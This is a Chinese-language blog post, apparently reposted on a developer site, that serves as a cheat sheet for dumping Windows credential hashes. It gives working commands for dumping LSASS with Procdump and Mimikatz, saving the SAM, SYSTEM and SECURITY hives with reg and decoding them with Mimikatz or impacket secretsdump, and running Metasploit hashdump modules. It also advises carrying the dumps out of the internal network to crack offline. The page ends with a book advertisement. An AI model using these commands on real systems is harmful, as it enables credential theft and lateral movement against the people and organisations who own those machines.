常用 Windows 抓取Hash

栏目: 数据库 · 发布时间: 6年前

内容简介:测试机器: Windows 10 1809Procdump(管理员权限下运行)

推荐使用 Procdump,reg 和 sharpdump 导出本地,再想办法从内网中运出来本地破解

测试机器: Windows 10 1809

0x01 Procdump + Mimikatz

Procdump

(管理员权限下运行)

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits

常用 Windows 抓取Hash

然后本地解出hash即可

sekurlsa::minidump C:\lsass.dmp
sekurlsa::logonpasswords full

常用 Windows 抓取Hash

0x02 Reg + impacket/Mimikatz (强推)

使用 Reg 需要NT/SYSTEM权限

reg save HKLM\SYSTEM system.hiv

reg save HKLM\SAM sam.hiv

reg save HKLM\security security.hiv

Mimikatz 调用 lsadump

lsadump::sam /system:system.hiv /sam:sam.hiv

常用 Windows 抓取Hash

impacket/secretsdump.py

python secretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCAL

常用 Windows 抓取Hash

0x03 Sharpdump (强推)

Out-Minidump.ps1 的 C#版本 编译结果

需要.NET 3.5版本框架

常用 Windows 抓取Hash

0x04 Wce、Quarks PwDump、GetPass……

没怎么用过,都是以前比较老的,Getpass是Mimikatz的编译版本,没啥意思

0x05 Msf modules

hashdump

条件:

  1. Meterpreter Session
  2. NT/SYSTEM

常用 Windows 抓取Hash

hashdump只能dump本地用户

smart_hashdump

条件

  1. Meterpreter Session
  2. NT/SYSTEM

常用 Windows 抓取Hash

可以dump本地 + 域用户hash


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

产品经理手册(原书第4版)(白金版)

产品经理手册(原书第4版)(白金版)

[美] 琳达·哥乔斯(Linda Gorchels) / 祝亚雄、冯华丽、金骆彬 / 机械工业出版社 / 2017-8 / 65.00

产品经理的职责起点是新产品开发,贯穿产品生命周期的全过程。本书按上下游产品管理进行组织。 在上游的新产品开发流程中,作者阐述了如何从市场、产品、行业、公司的角度规划企划方案,并获得老板、销售部、运营部的资源支持,推进新产品的项目流程,实现所有目标,制定和实施新产品发布。 下游产品的管理核心在于生命周期的管理,营销更是生命周期管理的重中之重。产品经理如何让产品满足客户需求,让客户获得对产......一起来看看 《产品经理手册(原书第4版)(白金版)》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

随机密码生成器
随机密码生成器

多种字符组合密码